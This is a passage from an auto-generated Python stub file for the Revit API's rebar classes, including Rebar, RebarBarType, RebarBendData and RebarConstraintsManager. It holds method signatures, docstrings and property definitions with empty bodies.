The arguments are interpreted as an arbitrary rectangle in 3D with vertices: origin, origin+xVec, origin+xVec+yVec, origin+yVec. The algorithm then proceeds as follows. First the bar is given the default values of the shape parameters from the shape definition. Then, if it is possible to do so without violating the shape definition, the parameter values are scaled so that the width and height of the shape (including bar thickness) match the lengths of xVec and yVec. If there is no way to do this within the shape definition due to overconstraining, a compromise is attempted, such as scaling the whole shape until either the width or the height is correct. Finally the shape is rotated to match the coordinate system of the box. The algorithm is the same one used in one-click placement. origin: One corner of the rectangle. xVec: Vector representing the first edge of the rectangle. The length must be positive. yVec: Vector representing the second edge of the rectangle. Must be perpendicular to xVec. """ pass def ScaleToBoxFor3D(self, origin, xVec, yVec, height): """ ScaleToBoxFor3D(self: Rebar, origin: XYZ, xVec: XYZ, yVec: XYZ, height: float) Move and resize a spiral or multiplanar instance to fit within a specified box. The arguments are interpreted as an arbitrary rectangle in 3D with vertices: origin, origin+xVec, origin+xVec+yVec, origin+yVec. One end of the rebar shape is inscribed in this rectangle following the procedure described for the ScaleToBox method. The other end is placed in the parallel plane at distance (center-to-center) given by the height argument, in the direction of (xVec x yVec). Note that spiral shapes interpret the input arguments using a different convention than multiplanar shapes. For spiral shapes, the spiral start will be placed in the rectangle defined by origin, xVec, yVec, and the end of the spiral will be placed in the parallel plane. For multiplanar shapes, the rebar is placed with its primary shape definition located in the parallel plane defined by the height argument, and its connector segments extending in the direction opposite (xVec x yVec). This method replaces ScaleToBoxForSpiral() from prior releases. origin: One corner of the rectangle. xVec: Vector representing the first edge of the rectangle. The length must be positive. yVec: Vector representing the second edge of the rectangle. Must be perpendicular to xVec. height: New value for the Height or MultiplanarDepth property. """ pass def SetBarHiddenStatus(self, view, barIndex, hide): """ SetBarHiddenStatus(self: Rebar, view: View, barIndex: int, hide: bool) Sets the bar in this rebar set to be hidden or unhidden in the given view. view: The view. barIndex: The index of the bar from this set. hide: True to hide this bar in the view, false to unhide the bar. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetHookOrientation(self, iEnd, hookOrientation): """ SetHookOrientation(self: Rebar, iEnd: int, hookOrientation: RebarHookOrientation) Defines the orientation of the hook plane at the start or at the end of the rebar with respect to the orientation of the first or the last curve and the plane normal. iEnd: 0 for the start hook, 1 for the end hook. hookOrientation: Only two values are permitted: Value = Right: The hook is on your right as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." Value = Left: The hook is on your left as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." """ pass def SetHookTypeId(self, end, hookTypeId): """ SetHookTypeId(self: Rebar, end: int, hookTypeId: ElementId) Set the id of the RebarHookType to be applied to the rebar. end: 0 for the start hook, 1 for the end hook. hookTypeId: The id of a RebarHookType element, or invalidElementId if the rebar should have no hook at the specified end. """ pass def SetHostId(self, doc, hostId): """ SetHostId(self: Rebar, doc: Document, hostId: ElementId) The element that contains the rebar. doc: The document containing both this element and the host element. hostId: The element that the rebar object belongs to, such as a structural wall, floor, foundation, beam, brace or column. The rebar does not need to be strictly inside the host, but it must be assigned to one host element. """ pass def SetLayoutAsFixedNumber(self, numberOfBarPositions, arrayLength, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsFixedNumber(self: Rebar, numberOfBarPositions: int, arrayLength: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to FixedNumber. numberOfBarPositions: The number of bar positions in rebar set arrayLength: The distribution length of rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsMaximumSpacing(self, spacing, arrayLength, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsMaximumSpacing(self: Rebar, spacing: float, arrayLength: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to MaximumSpacing spacing: The maximum spacing between rebar in rebar set arrayLength: The distribution length of rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsMinimumClearSpacing(self, spacing, arrayLength, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsMinimumClearSpacing(self: Rebar, spacing: float, arrayLength: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to MinimumClearSpacing spacing: The maximum spacing between rebar in rebar set arrayLength: The distribution length of rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsNumberWithSpacing(self, numberOfBarPositions, spacing, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsNumberWithSpacing(self: Rebar, numberOfBarPositions: int, spacing: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to NumberWithSpacing numberOfBarPositions: The number of bar positions in rebar set spacing: The maximum spacing between rebar in rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsSingle(self): """ SetLayoutAsSingle(self: Rebar) Sets the Layout Rule property of rebar set to Single. """ pass def SetPresentationMode(self, dBView, presentationMode): """ SetPresentationMode(self: Rebar, dBView: View, presentationMode: RebarPresentationMode) Sets the presentation mode for this rebar set when displayed in the given view. dBView: The view. presentationMode: The presentation mode. """ pass def SetSolidInView(self, view, solid): """ SetSolidInView(self: Rebar, view: View3D, solid: bool) Sets this rebar element to be shown solidly in a 3D view. view: The 3D view element solid: True if rebar is shown solidly, false otherwise. """ pass def SetUnobscuredInView(self, view, unobscured): """ SetUnobscuredInView(self: Rebar, view: View, unobscured: bool) Sets this rebar element to be shown unobscured in a view. view: The view element unobscured: True if rebar is shown unobscured, false otherwise. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ArrayLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the distribution path length of rebar set. Get: ArrayLength(self: Rebar) -> float Set: ArrayLength(self: Rebar) = value """ BarsOnNormalSide = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal. Get: BarsOnNormalSide(self: Rebar) -> bool Set: BarsOnNormalSide(self: Rebar) = value """ BaseFinishingTurns = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the number of finishing turns at the lower end of the spiral. Get: BaseFinishingTurns(self: Rebar) -> int Set: BaseFinishingTurns(self: Rebar) = value """ DistributionType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The type of rebar distribution(also known as Rebar Set Type). Get: DistributionType(self: Rebar) -> DistributionType Set: DistributionType(self: Rebar) = value """ Height = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the overall height. Get: Height(self: Rebar) -> float Set: Height(self: Rebar) = value """ IncludeFirstBar = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the first bar in rebar set is shown. Get: IncludeFirstBar(self: Rebar) -> bool Set: IncludeFirstBar(self: Rebar) = value """ IncludeLastBar = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the last bar in rebar set is shown. Get: IncludeLastBar(self: Rebar) -> bool Set: IncludeLastBar(self: Rebar) = value """ LayoutRule = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the layout rule of rebar set. Get: LayoutRule(self: Rebar) -> RebarLayoutRule """ MaxSpacing = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the maximum spacing between rebar in rebar set. Get: MaxSpacing(self: Rebar) -> float Set: MaxSpacing(self: Rebar) = value """ MultiplanarDepth = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a multiplanar rebar, the depth of the instance. Get: MultiplanarDepth(self: Rebar) -> float Set: MultiplanarDepth(self: Rebar) = value """ Normal = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A unit-length vector normal to the plane of the rebar Get: Normal(self: Rebar) -> XYZ """ NumberOfBarPositions = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of potential bars in the set. Get: NumberOfBarPositions(self: Rebar) -> int Set: NumberOfBarPositions(self: Rebar) = value """ Pitch = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the pitch, or vertical distance traveled in one rotation. Get: Pitch(self: Rebar) -> float Set: Pitch(self: Rebar) = value """ Quantity = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the number of bars in rebar set. Get: Quantity(self: Rebar) -> int """ RebarShapeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The RebarShape element that defines the shape of the rebar. Get: RebarShapeId(self: Rebar) -> ElementId Set: RebarShapeId(self: Rebar) = value """ ScheduleMark = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Schedule Mark parameter. On creation, the Schedule Mark is set to a value that is unique to the host, but it can be set to any value. Get: ScheduleMark(self: Rebar) -> str Set: ScheduleMark(self: Rebar) = value """ TopFinishingTurns = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the number of finishing turns at the upper end of the spiral. Get: TopFinishingTurns(self: Rebar) -> int Set: TopFinishingTurns(self: Rebar) = value """ TotalLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The length of an individual bar multiplied by Quantity. Get: TotalLength(self: Rebar) -> float """ Volume = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The volume of an individual bar multiplied by Quantity. Get: Volume(self: Rebar) -> float """ class RebarBarType(ElementType, IDisposable): """ A Rebar type object that is used in the generation of Rebar """ @staticmethod def Create(ADoc): """ Create(ADoc: Document) -> RebarBarType Creates a new RebarBarType object """ pass @staticmethod def CreateDefaultRebarBarType(ADoc): """ CreateDefaultRebarBarType(ADoc: Document) -> ElementId Creates a new RebarBarType object with a default name. ADoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetAutoCalcHookLengths(self, hookId): """ GetAutoCalcHookLengths(self: RebarBarType, hookId: ElementId) -> bool Identifies if the hook lengths of a hook type are automatically calculated for this bar type hookId: id of the hook type Returns: True if the hook lengths are automatically calculated, otherwise false """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetHookLength(self, hookId): """ GetHookLength(self: RebarBarType, hookId: ElementId) -> float Identifies the hook length for a hook type hookId: id of the hook type Returns: The hook length for a hook type """ pass def GetHookOffsetLength(self, hookId): """ GetHookOffsetLength(self: RebarBarType, hookId: ElementId) -> float Identifies the hook offset length for a hook type hookId: id of the hook type Returns: The hook offset length for a hook type """ pass def GetHookPermission(self, hookId): """ GetHookPermission(self: RebarBarType, hookId: ElementId) -> bool Identifies if a hook type is permitted for this bar type hookId: id of the hook type Returns: True if the hook type is permitted for this bar type, otherwise false """ pass def GetHookTangentLength(self, hookId): """ GetHookTangentLength(self: RebarBarType, hookId: ElementId) -> float Identifies the hook tangent length for a hook type hookId: id of the hook type Returns: The hook tangent length for a hook type """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: RebarBarType) -> RebarRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def SetAutoCalcHookLengths(self, hookId, autoCalculated): """ SetAutoCalcHookLengths(self: RebarBarType, hookId: ElementId, autoCalculated: bool) Identifies if the hook lengths of a hook type are automatically calculated for this bar type hookId: id of the hook type autoCalculated: True if the hook lengths should be automatically calculated, otherwise false When it is false, default hook length and default hook offset length will be reported """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetHookLength(self, hookId, hookLength): """ SetHookLength(self: RebarBarType, hookId: ElementId, hookLength: float) Identifies the hook length for a hook type hookId: id of the hook type hookLength: The hook length for a hook type """ pass def SetHookOffsetLength(self, hookId, newLength): """ SetHookOffsetLength(self: RebarBarType, hookId: ElementId, newLength: float) Identifies the hook offset length for a hook type hookId: id of the hook type newLength: The hook offset length for a hook type """ pass def SetHookPermission(self, hookId, permission): """ SetHookPermission(self: RebarBarType, hookId: ElementId, permission: bool) Identifies if a hook type is permitted for this bar type hookId: id of the hook type permission: True if the hook type should be permitted for this bar type, otherwise false """ pass def SetHookTangentLength(self, hookId, newLength): """ SetHookTangentLength(self: RebarBarType, hookId: ElementId, newLength: float) Identifies the hook tangent length for a hook type hookId: id of the hook type newLength: The hook tangent length for a hook type """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass BarDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines bar diameter of rebar Get: BarDiameter(self: RebarBarType) -> float Set: BarDiameter(self: RebarBarType) = value """ DeformationType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines bar deformation type. Get: DeformationType(self: RebarBarType) -> RebarDeformationType Set: DeformationType(self: RebarBarType) = value """ MaximumBendRadius = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines maximum bend radius of rebar Get: MaximumBendRadius(self: RebarBarType) -> float Set: MaximumBendRadius(self: RebarBarType) = value """ StandardBendDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines bar bend diameter for rebar whose style is standard Get: StandardBendDiameter(self: RebarBarType) -> float Set: StandardBendDiameter(self: RebarBarType) = value """ StandardHookBendDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines hook bend diameter for rebar whose style is standard Get: StandardHookBendDiameter(self: RebarBarType) -> float Set: StandardHookBendDiameter(self: RebarBarType) = value """ StirrupTieBendDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines bar and hook bend diameter for rebar whose style is stirrup/tie Get: StirrupTieBendDiameter(self: RebarBarType) -> float Set: StirrupTieBendDiameter(self: RebarBarType) = value """ class RebarBendData(object, IDisposable): """ The values in this class provide a summary of information taken from the RebarBarType, RebarHookType, and RebarStyle. RebarBendData(barType: RebarBarType, hookType0: RebarHookType, hookType1: RebarHookType, style: RebarStyle, hookOrient0: RebarHookOrientation, hookOrient1: RebarHookOrientation) RebarBendData() """ def Dispose(self): """ Dispose(self: RebarBendData) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarBendData, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, barType=None, hookType0=None, hookType1=None, style=None, hookOrient0=None, hookOrient1=None): """ __new__(cls: type, barType: RebarBarType, hookType0: RebarHookType, hookType1: RebarHookType, style: RebarStyle, hookOrient0: RebarHookOrientation, hookOrient1: RebarHookOrientation) __new__(cls: type) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass BarDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The diameter of the bar. Get: BarDiameter(self: RebarBendData) -> float Set: BarDiameter(self: RebarBendData) = value """ BendRadius = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The radius of all fillets, except hook fillets, in the Rebar shape. Get: BendRadius(self: RebarBendData) -> float Set: BendRadius(self: RebarBendData) = value """ HookAngle0 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The angle of the hook at the start. Get: HookAngle0(self: RebarBendData) -> int Set: HookAngle0(self: RebarBendData) = value """ HookAngle1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The angle of the hook at the end. Get: HookAngle1(self: RebarBendData) -> int Set: HookAngle1(self: RebarBendData) = value """ HookBendRadius = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The radius of the hook fillets in the Rebar shape. Get: HookBendRadius(self: RebarBendData) -> float Set: HookBendRadius(self: RebarBendData) = value """ HookLength0 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The extension length of the hook at the start. Get: HookLength0(self: RebarBendData) -> float Set: HookLength0(self: RebarBendData) = value """ HookLength1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The extension length of the hook at the end. Get: HookLength1(self: RebarBendData) -> float Set: HookLength1(self: RebarBendData) = value """ HookOrient0 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The orientation of the hook at the start. Get: HookOrient0(self: RebarBendData) -> RebarHookOrientation Set: HookOrient0(self: RebarBendData) = value """ HookOrient1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The orientation of the hook at the end. Get: HookOrient1(self: RebarBendData) -> RebarHookOrientation Set: HookOrient1(self: RebarBendData) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarBendData) -> bool """ class RebarConstrainedHandle(object, IDisposable): """ A class representing a handle on a Rebar that can be joined to a reference, such as a host Element's surface or cover, or another Rebar's handle. """ def Dispose(self): """ Dispose(self: RebarConstrainedHandle) """ pass def GetEdgeNumber(self): """ GetEdgeNumber(self: RebarConstrainedHandle) -> int If the RebarConstrainedHandle's RebarHandleType is 'Edge,' then this function will return the number of the edge that is driven by the handle. """ pass def GetHandleType(self): """ GetHandleType(self: RebarConstrainedHandle) -> RebarHandleType Returns the RebarHandleType of a RebarConstrainedHandle. Returns: The RebarHandleType of the specified RebarConstrainedHandle. """ pass def IsEdgeHandle(self): """ IsEdgeHandle(self: RebarConstrainedHandle) -> bool Returns true if the RebarHandleType of the RebarConstrainedHandle is 'Edge.' """ pass def IsValid(self): """ IsValid(self: RebarConstrainedHandle) -> bool Checks that the RebarConstrainedHandle still has access to valid Rebar handle data and that its RebarConstraintsManager is still valid. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarConstrainedHandle, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarConstrainedHandle) -> bool """ class RebarConstraint(object, IDisposable): """ A class representing a constraint on a handle of a rebar element. """ def Dispose(self): """ Dispose(self: RebarConstraint) """ pass def GetConstraintType(self): """ GetConstraintType(self: RebarConstraint) -> RebarConstraintType Returns the RebarConstraintType of a RebarConstraint. Returns: The RebarConstraintType of the specified RebarConstraint. """ pass def GetDistanceToTargetCover(self): """ GetDistanceToTargetCover(self: RebarConstraint) -> float Returns the distance from the RebarConstrainedHandle to the target Host Cover Element surface. The RebarConstraintType of the RebarConstraint must be 'ToCover.' """ pass def GetDistanceToTargetHostFace(self): """ GetDistanceToTargetHostFace(self: RebarConstraint) -> float Returns the distance from the RebarConstrainedHandle to the target Host Element surface. The RebarConstraintType of the RebarConstraint must be 'FixedDistanceToHostFace.' """ pass def GetRebarConstraintTargetHostFaceType(self): """ GetRebarConstraintTargetHostFaceType(self: RebarConstraint) -> RebarConstraintTargetHostFaceType Returns the RebarConstraintTargetHostFaceType of the host Element face to which the RebarConstraint is attached. The RebarConstraintType of the RebarConstraint must be 'FixedDistanceToHostFace' or 'ToCover.' """ pass def GetTargetElement(self): """ GetTargetElement(self: RebarConstraint) -> Element Returns the Element object (either Host or Rebar) which provides the constraint. """ pass def GetTargetHostFaceReference(self): """ GetTargetHostFaceReference(self: RebarConstraint) -> Reference Returns a reference to the host Element face to which the RebarConstraint is attached. The RebarConstraintType of the RebarConstraint must be 'FixedDistanceToHostFace' or 'ToCover.' Returns: Requested reference. """ pass def GetTargetRebarAngleOnBarOrHookBend(self): """ GetTargetRebarAngleOnBarOrHookBend(self: RebarConstraint) -> int Returns the angular increment along a bar or hook bend to which the RebarConstraint is attached. Returns: The angular increment relative to the reference bar edge. """ pass def GetTargetRebarBendNumber(self): """ GetTargetRebarBendNumber(self: RebarConstraint) -> int Returns the number of the bend on the other Rebar Element to which this RebarConstraint is attached. The RebarConstraint must be of RebarConstraintType 'ToOtherRebar,' and the TargetRebarConstraintType must be 'BarBend.' """ pass def GetTargetRebarConstraintType(self): """ GetTargetRebarConstraintType(self: RebarConstraint) -> TargetRebarConstraintType Returns the TargetRebarConstraintType of the handle on the other Rebar Element to which this RebarConstraint is attached. The RebarConstraintType of the RebarConstraint must be 'ToOtherRebar.' """ pass def GetTargetRebarEdgeNumber(self): """ GetTargetRebarEdgeNumber(self: RebarConstraint) -> int Returns the number of the edge on the other Rebar Element to which this RebarConstraint is attached. The RebarConstraint must be of RebarConstraintType 'ToOtherRebar,' and the TargetRebarConstraintType must be 'Edge.' """ pass def GetTargetRebarHookBarEnd(self): """ GetTargetRebarHookBarEnd(self: RebarConstraint) -> int Returns 0 or 1 to indicate which end hook on the other Rebar Element to which this RebarConstraint is attached. The RebarConstraint must be of RebarConstraintType 'ToOtherRebar,' and the TargetRebarConstraintType must be 'HookBend.' """ pass def HasAnEdgeNumber(self): """ HasAnEdgeNumber(self: RebarConstraint) -> bool Checks if the getTargetRebarEdgeNumber method can be called for the RebarConstraint. """ pass def IsEqual(self, other): """ IsEqual(self: RebarConstraint, other: RebarConstraint) -> bool Returns true if the specified RebarConstraint is the same as 'this.' The method can be used to determine which of the RebarConstraint candidates offered by the RebarConstraintsManager is currently active. """ pass def IsFixedDistanceToHostFace(self): """ IsFixedDistanceToHostFace(self: RebarConstraint) -> bool Returns true if the RebarConstraintType of the RebarConstraint is 'FixedDistanceToHostFace.' """ pass def IsToCover(self): """ IsToCover(self: RebarConstraint) -> bool Returns true if the RebarConstraintType of the RebarConstraint is 'ToCover.' """ pass def IsToHostFaceOrCover(self): """ IsToHostFaceOrCover(self: RebarConstraint) -> bool Returns true if the RebarConstraintType of the RebarConstraint is either 'FixedDistanceToHostFace' or 'ToCover.' """ pass def IsToOtherRebar(self): """ IsToOtherRebar(self: RebarConstraint) -> bool Returns true if the RebarConstraintType of the RebarConstraint is 'ToOtherRebar.' """ pass def IsValid(self): """ IsValid(self: RebarConstraint) -> bool Checks that the RebarConstraint still has access to valid Rebar constraint data and that its RebarConstraintsManager is still valid. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarConstraint, disposing: bool) """ pass def SetDistanceToTargetCover(self, distanceToTargetCover): """ SetDistanceToTargetCover(self: RebarConstraint, distanceToTargetCover: float) Sets the distance from the RebarConstrainedHandle to the target Host Cover Element surface. The RebarConstraintType of the RebarConstraint must be 'ToCover.' distanceToTargetCover: The distance is given as an offset value, the sign of which depends on Host Cover direction. """ pass def SetDistanceToTargetHostFace(self, offset): """ SetDistanceToTargetHostFace(self: RebarConstraint, offset: float) Sets the distance from the RebarConstrainedHandle to the target Host Element surface. The RebarConstraintType of the RebarConstraint must be 'FixedDistanceToHostFace.' offset: The distance is given as an offset value, the sign of which depends on Host Face direction. """ pass def TargetIsBarBend(self): """ TargetIsBarBend(self: RebarConstraint) -> bool Returns true if the RebarTargetConstraintType of the RebarConstraint is 'BarBend' """ pass def TargetIsHookBend(self): """ TargetIsHookBend(self: RebarConstraint) -> bool Returns true if the RebarTargetConstraintType of the RebarConstraint is 'HookBend' """ pass def TargetRebarConstraintTypeIsEdge(self): """ TargetRebarConstraintTypeIsEdge(self: RebarConstraint) -> bool Returns true if the RebarConstraintType of the RebarConstraint is 'ToOtherRebar,' and the RebarConstraint is attached to an edge of the other Rebar Element. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarConstraint) -> bool """ class RebarConstraintsManager(object, IDisposable): """ A class used to obtain information about the constraints (RebarConstraints) acting on the shape handles (RebarConstrainedHandles) of a Rebar element, and to replace default constraints with user-preferred choices. """ def ClearHandleConstraintPairHighlighting(self, aDoc): """ ClearHandleConstraintPairHighlighting(self: RebarConstraintsManager, aDoc: Document) Clears all highlighting in all views. """ pass def Dispose(self): """ Dispose(self: RebarConstraintsManager) """ pass def GetAllConstrainedHandles(self): """ GetAllConstrainedHandles(self: RebarConstraintsManager) -> IList[RebarConstrainedHandle] Retrieves all handles on the Rebar that are constrained to external references. Returns: A collection of RebarConstrainedHandles """ pass def GetConstraintCandidatesForHandle(self, handle): """ GetConstraintCandidatesForHandle(self: RebarConstraintsManager, handle: RebarConstrainedHandle) -> IList[RebarConstraint] Returns all possible RebarConstraints that could be used for a specified RebarConstrainedHandle. handle: The RebarConstrainedHandle for which constraint candidates are sought. Returns: A collection of RebarConstraints """ pass def GetCurrentConstraintOnHandle(self, handle): """ GetCurrentConstraintOnHandle(self: RebarConstraintsManager, handle: RebarConstrainedHandle) -> RebarConstraint Retrieves the RebarConstraint that acts on the specified RebarConstraintHandle. """ pass def GetPreferredConstraintOnHandle(self, handle): """ GetPreferredConstraintOnHandle(self: RebarConstraintsManager, handle: RebarConstrainedHandle) -> RebarConstraint Returns the RebarConstraint that has been set as preferred for the specified RebarConstrainedHandle. handle: The RebarConstrainedHandle for which the user RebarConstraint is to be returned. Returns: The user prefered RebarConstraint applied to the RebarConstrainedHandle. """ pass def HasValidRebar(self): """ HasValidRebar(self: RebarConstraintsManager) -> bool Checks whether the Manager's Rebar is still valid. """ pass def HighlightHandleConstraintPairInAllViews(self, aDoc, handle, constraint): """ HighlightHandleConstraintPairInAllViews(self: RebarConstraintsManager, aDoc: Document, handle: RebarConstrainedHandle, constraint: RebarConstraint) Highlights the specified RebarConstrainedHandle and RebarConstraint in all views. handle: The RebarConstrainedHandle to be highlighted in all views. constraint: The RebarConstraint to be highlighted in all views. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarConstraintsManager, disposing: bool) """ pass def RemovePreferredConstraintFromHandle(self, handle): """ RemovePreferredConstraintFromHandle(self: RebarConstraintsManager, handle: RebarConstrainedHandle) Clears the user-preferred RebarConstraint from the specified RebarConstrainedHandle. handle: The RebarConstrainedHandle for which the user RebarConstraint is to be deleted. """ pass def SetPreferredConstraintForHandle(self, handle, constraint): """ SetPreferredConstraintForHandle(self: RebarConstraintsManager, handle: RebarConstrainedHandle, constraint: RebarConstraint) Sets the RebarConstraint as preferred constraint target for the specified RebarConstrainedHandle. handle: The RebarConstrainedHandle to which the new RebarConstraint is to be applied. constraint: The new RebarConstraint to be applied to the RebarConstrainedHandle. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarConstraintsManager) -> bool """ IsRebarConstrainedPlacementEnabled = False class RebarConstraintTargetHostFaceType(Enum, IComparable, IFormattable, IConvertible): """ A type to help identify the individual face on a host element to which a Rebar handle is constrained. enum RebarConstraintTargetHostFaceType, values: Bottom (2), End0 (3), End1 (4), FaceWithTagId (0), Side0 (5), Side1 (6), Top (1) """ def __eq__(self, *args): #cannot find CLR method 